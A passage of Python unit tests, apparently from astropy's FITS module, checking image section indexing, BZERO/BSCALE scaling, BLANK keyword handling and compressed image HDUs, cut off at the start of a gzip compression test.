assert np.array_equal(fs[0].section[:, 2, :], dat[:, 2, :])
assert np.array_equal(fs[0].section[:, 2:5, :], dat[:, 2:5, :])
assert np.array_equal(fs[0].section[3:6, 3, :], dat[3:6, 3, :])
assert np.array_equal(fs[0].section[3:6, 3:7, :], dat[3:6, 3:7, :])
assert np.array_equal(fs[0].section[:, ::2], dat[:, ::2])
assert np.array_equal(fs[0].section[:, [1, 2, 4], 3],
dat[:, [1, 2, 4], 3])
bool_index = np.array([True, False, True, True, False,
False, True, True, False, True])
assert np.array_equal(fs[0].section[:, bool_index, :],
dat[:, bool_index, :])
assert np.array_equal(
fs[0].section[3:6, 3, :, ...], dat[3:6, 3, :, ...])
assert np.array_equal(fs[0].section[..., ::2], dat[..., ::2])
assert np.array_equal(fs[0].section[..., [1, 2, 4], 3],
dat[..., [1, 2, 4], 3])
fs.close()
def test_section_data_single(self):
a = np.array([1])
hdu = fits.PrimaryHDU(a)
hdu.writeto(self.temp('test_new.fits'))
hdul = fits.open(self.temp('test_new.fits'))
sec = hdul[0].section
dat = hdul[0].data
assert np.array_equal(sec[0], dat[0])
assert np.array_equal(sec[...], dat[...])
assert np.array_equal(sec[..., 0], dat[..., 0])
assert np.array_equal(sec[0, ...], dat[0, ...])
hdul.close()
def test_section_data_square(self):
a = np.arange(4).reshape(2, 2)
hdu = fits.PrimaryHDU(a)
hdu.writeto(self.temp('test_new.fits'))
hdul = fits.open(self.temp('test_new.fits'))
d = hdul[0]
dat = hdul[0].data
assert (d.section[:, :] == dat[:, :]).all()
assert (d.section[0, :] == dat[0, :]).all()
assert (d.section[1, :] == dat[1, :]).all()
assert (d.section[:, 0] == dat[:, 0]).all()
assert (d.section[:, 1] == dat[:, 1]).all()
assert (d.section[0, 0] == dat[0, 0]).all()
assert (d.section[0, 1] == dat[0, 1]).all()
assert (d.section[1, 0] == dat[1, 0]).all()
assert (d.section[1, 1] == dat[1, 1]).all()
assert (d.section[0:1, 0:1] == dat[0:1, 0:1]).all()
assert (d.section[0:2, 0:1] == dat[0:2, 0:1]).all()
assert (d.section[0:1, 0:2] == dat[0:1, 0:2]).all()
assert (d.section[0:2, 0:2] == dat[0:2, 0:2]).all()
hdul.close()
def test_section_data_cube(self):
a = np.arange(18).reshape(2, 3, 3)
hdu = fits.PrimaryHDU(a)
hdu.writeto(self.temp('test_new.fits'))
hdul = fits.open(self.temp('test_new.fits'))
d = hdul[0]
dat = hdul[0].data
assert (d.section[:] == dat[:]).all()
assert (d.section[:, :] == dat[:, :]).all()
# Test that various combinations of indexing on the section are equal to
# indexing the data.
# Testing all combinations of scalar-index and [:] for each dimension.
for idx1 in [slice(None), 0, 1]:
for idx2 in [slice(None), 0, 1, 2]:
for idx3 in [slice(None), 0, 1, 2]:
nd_idx = (idx1, idx2, idx3)
assert (d.section[nd_idx] == dat[nd_idx]).all()
# Test all ways to slice the last dimension but keeping the first two.
for idx3 in [slice(0, 1), slice(0, 2), slice(0, 3),
slice(1, 2), slice(1, 3), slice(2, 3)]:
nd_idx = (slice(None), slice(None), idx3)
assert (d.section[nd_idx] == dat[nd_idx]).all()
# Test various combinations (not exhaustive) to slice all dimensions.
for idx1 in [slice(0, 1), slice(1, 2)]:
for idx2 in [slice(0, 1), slice(0, 2), slice(0, 3),
slice(1, 2), slice(1, 3)]:
for idx3 in [slice(0, 1), slice(0, 2), slice(0, 3),
slice(1, 2), slice(1, 3), slice(2, 3)]:
nd_idx = (idx1, idx2, idx3)
assert (d.section[nd_idx] == dat[nd_idx]).all()
hdul.close()
def test_section_data_four(self):
a = np.arange(256).reshape(4, 4, 4, 4)
hdu = fits.PrimaryHDU(a)
hdu.writeto(self.temp('test_new.fits'))
hdul = fits.open(self.temp('test_new.fits'))
d = hdul[0]
dat = hdul[0].data
assert (d.section[:, :, :, :] == dat[:, :, :, :]).all()
assert (d.section[:, :, :] == dat[:, :, :]).all()
assert (d.section[:, :] == dat[:, :]).all()
assert (d.section[:] == dat[:]).all()
assert (d.section[0, :, :, :] == dat[0, :, :, :]).all()
assert (d.section[0, :, 0, :] == dat[0, :, 0, :]).all()
assert (d.section[:, :, 0, :] == dat[:, :, 0, :]).all()
assert (d.section[:, 1, 0, :] == dat[:, 1, 0, :]).all()
assert (d.section[:, :, :, 1] == dat[:, :, :, 1]).all()
hdul.close()
def test_section_data_scaled(self):
"""
Regression test for https://aeon.stsci.edu/ssb/trac/pyfits/ticket/143
This is like test_section_data_square but uses a file containing scaled
image data, to test that sections can work correctly with scaled data.
"""
hdul = fits.open(self.data('scale.fits'))
d = hdul[0]
dat = hdul[0].data
assert (d.section[:, :] == dat[:, :]).all()
assert (d.section[0, :] == dat[0, :]).all()
assert (d.section[1, :] == dat[1, :]).all()
assert (d.section[:, 0] == dat[:, 0]).all()
assert (d.section[:, 1] == dat[:, 1]).all()
assert (d.section[0, 0] == dat[0, 0]).all()
assert (d.section[0, 1] == dat[0, 1]).all()
assert (d.section[1, 0] == dat[1, 0]).all()
assert (d.section[1, 1] == dat[1, 1]).all()
assert (d.section[0:1, 0:1] == dat[0:1, 0:1]).all()
assert (d.section[0:2, 0:1] == dat[0:2, 0:1]).all()
assert (d.section[0:1, 0:2] == dat[0:1, 0:2]).all()
assert (d.section[0:2, 0:2] == dat[0:2, 0:2]).all()
hdul.close()
# Test without having accessed the full data first
hdul = fits.open(self.data('scale.fits'))
d = hdul[0]
assert (d.section[:, :] == dat[:, :]).all()
assert (d.section[0, :] == dat[0, :]).all()
assert (d.section[1, :] == dat[1, :]).all()
assert (d.section[:, 0] == dat[:, 0]).all()
assert (d.section[:, 1] == dat[:, 1]).all()
assert (d.section[0, 0] == dat[0, 0]).all()
assert (d.section[0, 1] == dat[0, 1]).all()
assert (d.section[1, 0] == dat[1, 0]).all()
assert (d.section[1, 1] == dat[1, 1]).all()
assert (d.section[0:1, 0:1] == dat[0:1, 0:1]).all()
assert (d.section[0:2, 0:1] == dat[0:2, 0:1]).all()
assert (d.section[0:1, 0:2] == dat[0:1, 0:2]).all()
assert (d.section[0:2, 0:2] == dat[0:2, 0:2]).all()
assert not d._data_loaded
hdul.close()
def test_do_not_scale_image_data(self):
with fits.open(self.data('scale.fits'), do_not_scale_image_data=True) as hdul:
assert hdul[0].data.dtype == np.dtype('>i2')
with fits.open(self.data('scale.fits')) as hdul:
assert hdul[0].data.dtype == np.dtype('float32')
def test_append_uint_data(self):
"""Regression test for https://aeon.stsci.edu/ssb/trac/pyfits/ticket/56
(BZERO and BSCALE added in the wrong location when appending scaled
data)
"""
fits.writeto(self.temp('test_new.fits'), data=np.array([],
dtype='uint8'))
d = np.zeros([100, 100]).astype('uint16')
fits.append(self.temp('test_new.fits'), data=d)
with fits.open(self.temp('test_new.fits'), uint=True) as f:
assert f[1].data.dtype == 'uint16'
def test_scale_with_explicit_bzero_bscale(self):
"""
Regression test for https://github.com/astropy/astropy/issues/6399
"""
hdu2 = fits.ImageHDU(np.random.rand(100, 100))
# The line below raised an exception in astropy 2.0, so if it does not
# raise an error here, that is progress.
hdu2.scale(type='uint8', bscale=1, bzero=0)
def test_uint_header_consistency(self):
"""
Regression test for https://github.com/astropy/astropy/issues/2305
This ensures that an HDU containing unsigned integer data always has
the apppriate BZERO value in its header.
"""
for int_size in (16, 32, 64):
# Just make an array of some unsigned ints that wouldn't fit in a
# signed int array of the same bit width
max_uint = (2 ** int_size) - 1
if int_size == 64:
max_uint = np.uint64(int_size)
dtype = f'uint{int_size}'
arr = np.empty(100, dtype=dtype)
arr.fill(max_uint)
arr -= np.arange(100, dtype=dtype)
uint_hdu = fits.PrimaryHDU(data=arr)
assert np.all(uint_hdu.data == arr)
assert uint_hdu.data.dtype.name == f'uint{int_size}'
assert 'BZERO' in uint_hdu.header
assert uint_hdu.header['BZERO'] == (2 ** (int_size - 1))
filename = f'uint{int_size}.fits'
uint_hdu.writeto(self.temp(filename))
with fits.open(self.temp(filename), uint=True) as hdul:
new_uint_hdu = hdul[0]
assert np.all(new_uint_hdu.data == arr)
assert new_uint_hdu.data.dtype.name == f'uint{int_size}'
assert 'BZERO' in new_uint_hdu.header
assert new_uint_hdu.header['BZERO'] == (2 ** (int_size - 1))
@pytest.mark.parametrize(('from_file'), (False, True))
@pytest.mark.parametrize(('do_not_scale'), (False,))
def test_uint_header_keywords_removed_after_bitpix_change(self,
from_file,
do_not_scale):
"""
Regression test for https://github.com/astropy/astropy/issues/4974
BZERO/BSCALE should be removed if data is converted to a floating
point type.
Currently excluding the case where do_not_scale_image_data=True
because it is not clear what the expectation should be.
"""
arr = np.zeros(100, dtype='uint16')
if from_file:
# To generate the proper input file we always want to scale the
# data before writing it...otherwise when we open it will be
# regular (signed) int data.
tmp_uint = fits.PrimaryHDU(arr)
filename = 'unsigned_int.fits'
tmp_uint.writeto(self.temp(filename))
with fits.open(self.temp(filename),
do_not_scale_image_data=do_not_scale) as f:
uint_hdu = f[0]
# Force a read before we close.
_ = uint_hdu.data
else:
uint_hdu = fits.PrimaryHDU(arr,
do_not_scale_image_data=do_not_scale)
# Make sure appropriate keywords are in the header. See
# https://github.com/astropy/astropy/pull/3916#issuecomment-122414532
# for discussion.
assert 'BSCALE' in uint_hdu.header
assert 'BZERO' in uint_hdu.header
assert uint_hdu.header['BSCALE'] == 1
assert uint_hdu.header['BZERO'] == 32768
# Convert data to floating point...
uint_hdu.data = uint_hdu.data * 1.0
# ...bitpix should be negative.
assert uint_hdu.header['BITPIX'] < 0
# BSCALE and BZERO should NOT be in header any more.
assert 'BSCALE' not in uint_hdu.header
assert 'BZERO' not in uint_hdu.header
# This is the main test...the data values should round trip
# as zero.
filename = 'test_uint_to_float.fits'
uint_hdu.writeto(self.temp(filename))
with fits.open(self.temp(filename)) as hdul:
assert (hdul[0].data == 0).all()
def test_blanks(self):
"""Test image data with blank spots in it (which should show up as
NaNs in the data array.
"""
arr = np.zeros((10, 10), dtype=np.int32)
# One row will be blanks
arr[1] = 999
hdu = fits.ImageHDU(data=arr)
hdu.header['BLANK'] = 999
hdu.writeto(self.temp('test_new.fits'))
with fits.open(self.temp('test_new.fits')) as hdul:
assert np.isnan(hdul[1].data[1]).all()
def test_invalid_blanks(self):
"""
Test that invalid use of the BLANK keyword leads to an appropriate
warning, and that the BLANK keyword is ignored when returning the
HDU data.
Regression test for https://github.com/astropy/astropy/issues/3865
"""
arr = np.arange(5, dtype=np.float64)
hdu = fits.PrimaryHDU(data=arr)
hdu.header['BLANK'] = 2
with catch_warnings() as w:
hdu.writeto(self.temp('test_new.fits'))
# Allow the HDU to be written, but there should be a warning
# when writing a header with BLANK when then data is not
# int
assert len(w) == 1
assert "Invalid 'BLANK' keyword in header" in str(w[0].message)
# Should also get a warning when opening the file, and the BLANK
# value should not be applied
with catch_warnings() as w:
with fits.open(self.temp('test_new.fits')) as h:
assert len(w) == 1
assert "Invalid 'BLANK' keyword in header" in str(w[0].message)
assert np.all(arr == h[0].data)
def test_scale_back_with_blanks(self):
"""
Test that when auto-rescaling integer data with "blank" values (where
the blanks are replaced by NaN in the float data), that the "BLANK"
keyword is removed from the header.
Further, test that when using the ``scale_back=True`` option the blank
values are restored properly.
Regression test for https://github.com/astropy/astropy/issues/3865
"""
# Make the sample file
arr = np.arange(5, dtype=np.int32)
hdu = fits.PrimaryHDU(data=arr)
hdu.scale('int16', bscale=1.23)
# Creating data that uses BLANK is currently kludgy--a separate issue
# TODO: Rewrite this test when scaling with blank support is better
# supported
# Let's just add a value to the data that should be converted to NaN
# when it is read back in:
filename = self.temp('test.fits')
hdu.data[0] = 9999
hdu.header['BLANK'] = 9999
hdu.writeto(filename)
with fits.open(filename) as hdul:
data = hdul[0].data
assert np.isnan(data[0])
with pytest.warns(fits.verify.VerifyWarning,
match=r"Invalid 'BLANK' keyword in header"):
hdul.writeto(self.temp('test2.fits'))
# Now reopen the newly written file. It should not have a 'BLANK'
# keyword
with catch_warnings() as w:
with fits.open(self.temp('test2.fits')) as hdul2:
assert len(w) == 0
assert 'BLANK' not in hdul2[0].header
data = hdul2[0].data
assert np.isnan(data[0])
# Finally, test that scale_back keeps the BLANKs correctly
with fits.open(filename, scale_back=True,
mode='update') as hdul3:
data = hdul3[0].data
assert np.isnan(data[0])
with fits.open(filename,
do_not_scale_image_data=True) as hdul4:
assert hdul4[0].header['BLANK'] == 9999
assert hdul4[0].header['BSCALE'] == 1.23
assert hdul4[0].data[0] == 9999
def test_bzero_with_floats(self):
"""Test use of the BZERO keyword in an image HDU containing float
data.
"""
arr = np.zeros((10, 10)) - 1
hdu = fits.ImageHDU(data=arr)
hdu.header['BZERO'] = 1.0
hdu.writeto(self.temp('test_new.fits'))
with fits.open(self.temp('test_new.fits')) as hdul:
arr += 1
assert (hdul[1].data == arr).all()
def test_rewriting_large_scaled_image(self):
"""Regression test for https://aeon.stsci.edu/ssb/trac/pyfits/ticket/84 and
https://aeon.stsci.edu/ssb/trac/pyfits/ticket/101
"""
hdul = fits.open(self.data('fixed-1890.fits'))
orig_data = hdul[0].data
with ignore_warnings():
hdul.writeto(self.temp('test_new.fits'), overwrite=True)
hdul.close()
hdul = fits.open(self.temp('test_new.fits'))
assert (hdul[0].data == orig_data).all()
hdul.close()
# Just as before, but this time don't touch hdul[0].data before writing
# back out--this is the case that failed in
# https://aeon.stsci.edu/ssb/trac/pyfits/ticket/84
hdul = fits.open(self.data('fixed-1890.fits'))
with ignore_warnings():
hdul.writeto(self.temp('test_new.fits'), overwrite=True)
hdul.close()
hdul = fits.open(self.temp('test_new.fits'))
assert (hdul[0].data == orig_data).all()
hdul.close()
# Test opening/closing/reopening a scaled file in update mode
hdul = fits.open(self.data('fixed-1890.fits'),
do_not_scale_image_data=True)
hdul.writeto(self.temp('test_new.fits'), overwrite=True,
output_verify='silentfix')
hdul.close()
hdul = fits.open(self.temp('test_new.fits'))
orig_data = hdul[0].data
hdul.close()
hdul = fits.open(self.temp('test_new.fits'), mode='update')
hdul.close()
hdul = fits.open(self.temp('test_new.fits'))
assert (hdul[0].data == orig_data).all()
hdul = fits.open(self.temp('test_new.fits'))
hdul.close()
def test_image_update_header(self):
"""
Regression test for https://aeon.stsci.edu/ssb/trac/pyfits/ticket/105
Replacing the original header to an image HDU and saving should update
the NAXISn keywords appropriately and save the image data correctly.
"""
# Copy the original file before saving to it
self.copy_file('test0.fits')
with fits.open(self.temp('test0.fits'), mode='update') as hdul:
orig_data = hdul[1].data.copy()
hdr_copy = hdul[1].header.copy()
del hdr_copy['NAXIS*']
hdul[1].header = hdr_copy
with fits.open(self.temp('test0.fits')) as hdul:
assert (orig_data == hdul[1].data).all()
def test_open_scaled_in_update_mode(self):
"""
Regression test for https://aeon.stsci.edu/ssb/trac/pyfits/ticket/119
(Don't update scaled image data if the data is not read)
This ensures that merely opening and closing a file containing scaled
image data does not cause any change to the data (or the header).
Changes should only occur if the data is accessed.
"""
# Copy the original file before making any possible changes to it
self.copy_file('scale.fits')
mtime = os.stat(self.temp('scale.fits')).st_mtime
time.sleep(1)
fits.open(self.temp('scale.fits'), mode='update').close()
# Ensure that no changes were made to the file merely by immediately
# opening and closing it.
assert mtime == os.stat(self.temp('scale.fits')).st_mtime
# Insert a slight delay to ensure the mtime does change when the file
# is changed
time.sleep(1)
hdul = fits.open(self.temp('scale.fits'), 'update')
orig_data = hdul[0].data
hdul.close()
# Now the file should be updated with the rescaled data
assert mtime != os.stat(self.temp('scale.fits')).st_mtime
hdul = fits.open(self.temp('scale.fits'), mode='update')
assert hdul[0].data.dtype == np.dtype('>f4')
assert hdul[0].header['BITPIX'] == -32
assert 'BZERO' not in hdul[0].header
assert 'BSCALE' not in hdul[0].header
assert (orig_data == hdul[0].data).all()
# Try reshaping the data, then closing and reopening the file; let's
# see if all the changes are preseved properly
hdul[0].data.shape = (42, 10)
hdul.close()
hdul = fits.open(self.temp('scale.fits'))
assert hdul[0].shape == (42, 10)
assert hdul[0].data.dtype == np.dtype('>f4')
assert hdul[0].header['BITPIX'] == -32
assert 'BZERO' not in hdul[0].header
assert 'BSCALE' not in hdul[0].header
hdul.close()
def test_scale_back(self):
"""A simple test for https://aeon.stsci.edu/ssb/trac/pyfits/ticket/120
The scale_back feature for image HDUs.
"""
self.copy_file('scale.fits')
with fits.open(self.temp('scale.fits'), mode='update',
scale_back=True) as hdul:
orig_bitpix = hdul[0].header['BITPIX']
orig_bzero = hdul[0].header['BZERO']
orig_bscale = hdul[0].header['BSCALE']
orig_data = hdul[0].data.copy()
hdul[0].data[0] = 0
with fits.open(self.temp('scale.fits'),
do_not_scale_image_data=True) as hdul:
assert hdul[0].header['BITPIX'] == orig_bitpix
assert hdul[0].header['BZERO'] == orig_bzero
assert hdul[0].header['BSCALE'] == orig_bscale
zero_point = int(math.floor(-orig_bzero / orig_bscale))
assert (hdul[0].data[0] == zero_point).all()
with fits.open(self.temp('scale.fits')) as hdul:
assert (hdul[0].data[1:] == orig_data[1:]).all()
def test_image_none(self):
"""
Regression test for https://github.com/spacetelescope/PyFITS/issues/27
"""
with fits.open(self.data('test0.fits')) as h:
h[1].data
h[1].data = None
h[1].writeto(self.temp('test.fits'))
with fits.open(self.temp('test.fits')) as h:
assert h[1].data is None
assert h[1].header['NAXIS'] == 0
assert 'NAXIS1' not in h[1].header
assert 'NAXIS2' not in h[1].header
def test_invalid_blank(self):
"""
Regression test for https://github.com/astropy/astropy/issues/2711
If the BLANK keyword contains an invalid value it should be ignored for
any calculations (though a warning should be issued).
"""
data = np.arange(100, dtype=np.float64)
hdu = fits.PrimaryHDU(data)
hdu.header['BLANK'] = 'nan'
with pytest.warns(fits.verify.VerifyWarning, match=r"Invalid value for "
r"'BLANK' keyword in header: 'nan'"):
hdu.writeto(self.temp('test.fits'))
with catch_warnings() as w:
with fits.open(self.temp('test.fits')) as hdul:
assert np.all(hdul[0].data == data)
assert len(w) == 2
msg = "Invalid value for 'BLANK' keyword in header"
assert msg in str(w[0].message)
msg = "Invalid 'BLANK' keyword"
assert msg in str(w[1].message)
def test_scaled_image_fromfile(self):
"""
Regression test for https://github.com/astropy/astropy/issues/2710
"""
# Make some sample data
a = np.arange(100, dtype=np.float32)
hdu = fits.PrimaryHDU(data=a.copy())
hdu.scale(bscale=1.1)
hdu.writeto(self.temp('test.fits'))
with open(self.temp('test.fits'), 'rb') as f:
file_data = f.read()
hdul = fits.HDUList.fromstring(file_data)
assert np.allclose(hdul[0].data, a)
def test_set_data(self):
"""
Test data assignment - issue #5087
"""
im = fits.ImageHDU()
ar = np.arange(12)
im.data = ar
def test_scale_bzero_with_int_data(self):
"""
Regression test for https://github.com/astropy/astropy/issues/4600
"""
a = np.arange(100, 200, dtype=np.int16)
hdu1 = fits.PrimaryHDU(data=a.copy())
hdu2 = fits.PrimaryHDU(data=a.copy())
# Previously the following line would throw a TypeError,
# now it should be identical to the integer bzero case
hdu1.scale('int16', bzero=99.0)
hdu2.scale('int16', bzero=99)
assert np.allclose(hdu1.data, hdu2.data)
def test_scale_back_uint_assignment(self):
"""
Extend fix for #4600 to assignment to data
Suggested by:
https://github.com/astropy/astropy/pull/4602#issuecomment-208713748
"""
a = np.arange(100, 200, dtype=np.uint16)
fits.PrimaryHDU(a).writeto(self.temp('test.fits'))
with fits.open(self.temp('test.fits'), mode="update",
scale_back=True) as (hdu,):
hdu.data[:] = 0
assert np.allclose(hdu.data, 0)
class TestCompressedImage(FitsTestCase):
def test_empty(self):
"""
Regression test for https://github.com/astropy/astropy/issues/2595
"""
hdu = fits.CompImageHDU()
assert hdu.data is None
hdu.writeto(self.temp('test.fits'))
with fits.open(self.temp('test.fits'), mode='update') as hdul:
assert len(hdul) == 2
assert isinstance(hdul[1], fits.CompImageHDU)
assert hdul[1].data is None
# Now test replacing the empty data with an array and see what
# happens
hdul[1].data = np.arange(100, dtype=np.int32)
with fits.open(self.temp('test.fits')) as hdul:
assert len(hdul) == 2
assert isinstance(hdul[1], fits.CompImageHDU)
assert np.all(hdul[1].data == np.arange(100, dtype=np.int32))
@pytest.mark.parametrize(
('data', 'compression_type', 'quantize_level'),
[(np.zeros((2, 10, 10), dtype=np.float32), 'RICE_1', 16),
(np.zeros((2, 10, 10), dtype=np.float32), 'GZIP_1', -0.01),
(np.zeros((2, 10, 10), dtype=np.float32), 'GZIP_2', -0.01),
(np.zeros((100, 100)) + 1, 'HCOMPRESS_1', 16),
(np.zeros((10, 10)), 'PLIO_1', 16)])
@pytest.mark.parametrize('byte_order', ['<', '>'])
def test_comp_image(self, data, compression_type, quantize_level,
byte_order):
data = data.newbyteorder(byte_order)
primary_hdu = fits.PrimaryHDU()
ofd = fits.HDUList(primary_hdu)
chdu = fits.CompImageHDU(data, name='SCI',
compression_type=compression_type,
quantize_level=quantize_level)
ofd.append(chdu)
ofd.writeto(self.temp('test_new.fits'), overwrite=True)
ofd.close()
with fits.open(self.temp('test_new.fits')) as fd:
assert (fd[1].data == data).all()
assert fd[1].header['NAXIS'] == chdu.header['NAXIS']
assert fd[1].header['NAXIS1'] == chdu.header['NAXIS1']
assert fd[1].header['NAXIS2'] == chdu.header['NAXIS2']
assert fd[1].header['BITPIX'] == chdu.header['BITPIX']
@pytest.mark.skipif('not HAS_SCIPY')
def test_comp_image_quantize_level(self):
"""
Regression test for https://github.com/astropy/astropy/issues/5969
Test that quantize_level is used.
"""
import scipy.misc
np.random.seed(42)
data = scipy.misc.ascent() + np.random.randn(512, 512)*10
fits.ImageHDU(data).writeto(self.temp('im1.fits'))
fits.CompImageHDU(data, compression_type='RICE_1', quantize_method=1,
quantize_level=-1, dither_seed=5)\
.writeto(self.temp('im2.fits'))
fits.CompImageHDU(data, compression_type='RICE_1', quantize_method=1,
quantize_level=-100, dither_seed=5)\
.writeto(self.temp('im3.fits'))
im1 = fits.getdata(self.temp('im1.fits'))
im2 = fits.getdata(self.temp('im2.fits'))
im3 = fits.getdata(self.temp('im3.fits'))
assert not np.array_equal(im2, im3)
assert np.isclose(np.min(im1 - im2), -0.5, atol=1e-3)
assert np.isclose(np.max(im1 - im2), 0.5, atol=1e-3)
assert np.isclose(np.min(im1 - im3), -50, atol=1e-1)
assert np.isclose(np.max(im1 - im3), 50, atol=1e-1)
def test_comp_image_hcompression_1_invalid_data(self):
"""
Tests compression with the HCOMPRESS_1 algorithm with data that is
not 2D and has a non-2D tile size.
"""
pytest.raises(ValueError, fits.CompImageHDU,
np.zeros((2, 10, 10), dtype=np.float32), name='SCI',
compression_type='HCOMPRESS_1', quantize_level=16,
tile_size=[2, 10, 10])
def test_comp_image_hcompress_image_stack(self):
"""
Regression test for https://aeon.stsci.edu/ssb/trac/pyfits/ticket/171
Tests that data containing more than two dimensions can be
compressed with HCOMPRESS_1 so long as the user-supplied tile size can
be flattened to two dimensions.
"""
cube = np.arange(300, dtype=np.float32).reshape(3, 10, 10)
hdu = fits.CompImageHDU(data=cube, name='SCI',
compression_type='HCOMPRESS_1',
quantize_level=16, tile_size=[5, 5, 1])
hdu.writeto(self.temp('test.fits'))
with fits.open(self.temp('test.fits')) as hdul:
# HCOMPRESSed images are allowed to deviate from the original by
# about 1/quantize_level of the RMS in each tile.
assert np.abs(hdul['SCI'].data - cube).max() < 1./15.
def test_subtractive_dither_seed(self):
"""
Regression test for https://github.com/spacetelescope/PyFITS/issues/32
Ensure that when floating point data is compressed with the
SUBTRACTIVE_DITHER_1 quantization method that the correct ZDITHER0 seed
is added to the header, and that the data can be correctly
decompressed.
"""
array = np.arange(100.0).reshape(10, 10)
csum = (array[0].view('uint8').sum() % 10000) + 1
hdu = fits.CompImageHDU(data=array,
quantize_method=SUBTRACTIVE_DITHER_1,
dither_seed=DITHER_SEED_CHECKSUM)
hdu.writeto(self.temp('test.fits'))
with fits.open(self.temp('test.fits')) as hdul:
assert isinstance(hdul[1], fits.CompImageHDU)
assert 'ZQUANTIZ' in hdul[1]._header
assert hdul[1]._header['ZQUANTIZ'] == 'SUBTRACTIVE_DITHER_1'
assert 'ZDITHER0' in hdul[1]._header
assert hdul[1]._header['ZDITHER0'] == csum
assert np.all(hdul[1].data == array)
def test_disable_image_compression(self):
with catch_warnings():
# No warnings should be displayed in this case
warnings.simplefilter('error')
with fits.open(self.data('comp.fits'),
disable_image_compression=True) as hdul:
# The compressed image HDU should show up as a BinTableHDU, but
# *not* a CompImageHDU
assert isinstance(hdul[1], fits.BinTableHDU)
assert not isinstance(hdul[1], fits.CompImageHDU)
with fits.open(self.data('comp.fits')) as hdul:
assert isinstance(hdul[1], fits.CompImageHDU)
def test_open_comp_image_in_update_mode(self):
"""
Regression test for https://aeon.stsci.edu/ssb/trac/pyfits/ticket/167
Similar to test_open_scaled_in_update_mode(), but specifically for
compressed images.
"""
# Copy the original file before making any possible changes to it
self.copy_file('comp.fits')
mtime = os.stat(self.temp('comp.fits')).st_mtime
time.sleep(1)
fits.open(self.temp('comp.fits'), mode='update').close()
# Ensure that no changes were made to the file merely by immediately
# opening and closing it.
assert mtime == os.stat(self.temp('comp.fits')).st_mtime
def test_open_scaled_in_update_mode_compressed(self):
"""
Regression test for https://aeon.stsci.edu/ssb/trac/pyfits/ticket/88 2
Identical to test_open_scaled_in_update_mode() but with a compressed
version of the scaled image.
"""
# Copy+compress the original file before making any possible changes to
# it
with fits.open(self.data('scale.fits'),
do_not_scale_image_data=True) as hdul:
chdu = fits.CompImageHDU(data=hdul[0].data,
header=hdul[0].header)
chdu.writeto(self.temp('scale.fits'))
mtime = os.stat(self.temp('scale.fits')).st_mtime
time.sleep(1)
fits.open(self.temp('scale.fits'), mode='update').close()
# Ensure that no changes were made to the file merely by immediately
# opening and closing it.
assert mtime == os.stat(self.temp('scale.fits')).st_mtime
# Insert a slight delay to ensure the mtime does change when the file
# is changed
time.sleep(1)
hdul = fits.open(self.temp('scale.fits'), 'update')
hdul[1].data
hdul.close()
# Now the file should be updated with the rescaled data
assert mtime != os.stat(self.temp('scale.fits')).st_mtime
hdul = fits.open(self.temp('scale.fits'), mode='update')
assert hdul[1].data.dtype == np.dtype('float32')
assert hdul[1].header['BITPIX'] == -32
assert 'BZERO' not in hdul[1].header
assert 'BSCALE' not in hdul[1].header
# Try reshaping the data, then closing and reopening the file; let's
# see if all the changes are preseved properly
hdul[1].data.shape = (42, 10)
hdul.close()
hdul = fits.open(self.temp('scale.fits'))
assert hdul[1].shape == (42, 10)
assert hdul[1].data.dtype == np.dtype('float32')
assert hdul[1].header['BITPIX'] == -32
assert 'BZERO' not in hdul[1].header
assert 'BSCALE' not in hdul[1].header
hdul.close()
def test_write_comp_hdu_direct_from_existing(self):
with fits.open(self.data('comp.fits')) as hdul:
hdul[1].writeto(self.temp('test.fits'))
with fits.open(self.data('comp.fits')) as hdul1:
with fits.open(self.temp('test.fits')) as hdul2:
assert np.all(hdul1[1].data == hdul2[1].data)
assert comparerecords(hdul1[1].compressed_data,
hdul2[1].compressed_data)
def test_rewriting_large_scaled_image_compressed(self):
"""
Regression test for https://aeon.stsci.edu/ssb/trac/pyfits/ticket/88 1
Identical to test_rewriting_large_scaled_image() but with a compressed
image.
"""
with fits.open(self.data('fixed-1890.fits'),
do_not_scale_image_data=True) as hdul:
chdu = fits.CompImageHDU(data=hdul[0].data,
header=hdul[0].header)
chdu.writeto(self.temp('fixed-1890-z.fits'))
hdul = fits.open(self.temp('fixed-1890-z.fits'))
orig_data = hdul[1].data
with ignore_warnings():
hdul.writeto(self.temp('test_new.fits'), overwrite=True)
hdul.close()
hdul = fits.open(self.temp('test_new.fits'))
assert (hdul[1].data == orig_data).all()
hdul.close()
# Just as before, but this time don't touch hdul[0].data before writing
# back out--this is the case that failed in
# https://aeon.stsci.edu/ssb/trac/pyfits/ticket/84
hdul = fits.open(self.temp('fixed-1890-z.fits'))
with ignore_warnings():
hdul.writeto(self.temp('test_new.fits'), overwrite=True)
hdul.close()
hdul = fits.open(self.temp('test_new.fits'))
assert (hdul[1].data == orig_data).all()
hdul.close()
# Test opening/closing/reopening a scaled file in update mode
hdul = fits.open(self.temp('fixed-1890-z.fits'),
do_not_scale_image_data=True)
hdul.writeto(self.temp('test_new.fits'), overwrite=True,
output_verify='silentfix')
hdul.close()
hdul = fits.open(self.temp('test_new.fits'))
orig_data = hdul[1].data
hdul.close()
hdul = fits.open(self.temp('test_new.fits'), mode='update')
hdul.close()
hdul = fits.open(self.temp('test_new.fits'))
assert (hdul[1].data == orig_data).all()
hdul = fits.open(self.temp('test_new.fits'))
hdul.close()
def test_scale_back_compressed(self):
"""
Regression test for https://aeon.stsci.edu/ssb/trac/pyfits/ticket/88 3
Identical to test_scale_back() but uses a compressed image.
"""
# Create a compressed version of the scaled image
with fits.open(self.data('scale.fits'),
do_not_scale_image_data=True) as hdul:
chdu = fits.CompImageHDU(data=hdul[0].data,
header=hdul[0].header)
chdu.writeto(self.temp('scale.fits'))
with fits.open(self.temp('scale.fits'), mode='update',
scale_back=True) as hdul:
orig_bitpix = hdul[1].header['BITPIX']
orig_bzero = hdul[1].header['BZERO']
orig_bscale = hdul[1].header['BSCALE']
orig_data = hdul[1].data.copy()
hdul[1].data[0] = 0
with fits.open(self.temp('scale.fits'),
do_not_scale_image_data=True) as hdul:
assert hdul[1].header['BITPIX'] == orig_bitpix
assert hdul[1].header['BZERO'] == orig_bzero
assert hdul[1].header['BSCALE'] == orig_bscale
zero_point = int(math.floor(-orig_bzero / orig_bscale))
assert (hdul[1].data[0] == zero_point).all()
with fits.open(self.temp('scale.fits')) as hdul:
assert (hdul[1].data[1:] == orig_data[1:]).all()
# Extra test to ensure that after everything the data is still the
# same as in the original uncompressed version of the image
with fits.open(self.data('scale.fits')) as hdul2:
# Recall we made the same modification to the data in hdul
# above
hdul2[0].data[0] = 0
assert (hdul[1].data == hdul2[0].data).all()
def test_lossless_gzip_compression(self):
